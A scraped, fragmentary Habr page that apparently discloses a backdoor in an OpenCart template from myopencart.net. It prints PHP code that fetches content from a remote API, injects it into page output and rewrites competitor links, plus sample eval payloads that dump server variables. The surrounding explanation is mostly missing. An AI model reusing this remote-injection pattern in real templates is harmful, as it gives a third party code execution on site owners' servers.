Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!
eval( 'echo "Все что угодно."; die();' );$ouput = 'eval( \'echo "Все что угодно."; die();\' );';
echo $output;<?php
function get_page($url) {
$agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch,CURLOPT_VERBOSE,false);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$page = curl_exec($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
switch ($httpcode) {
case '200':
return $page;
break;
case '404';
return false;
break;
}
}
$ouput = "<html><body><a href='http://opencart.com'>opencart.com</a></body></html>";
if ( $ftend = get_page("http://example.com/api.php") ) {
$find = array("</body>", "</html>", "opencart.com", "maxzon.ru", "myopencart.ru", "opencartforum.ru", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net");
$ouput = str_replace($find, $replace, $ouput);
echo $ouput;
}
<?php
echo eval( 'var_dump($_SERVER); die();' );
die();
<html><body><a href='http://myopencart.net'>myopencart.net</a><?php
echo eval( 'var_dump($_SERVER); die();' );
die();<?php
echo eval( 'var_dump($_SERVER); die();' );
die();
История одного шаблона или бэкдор от myopencart.net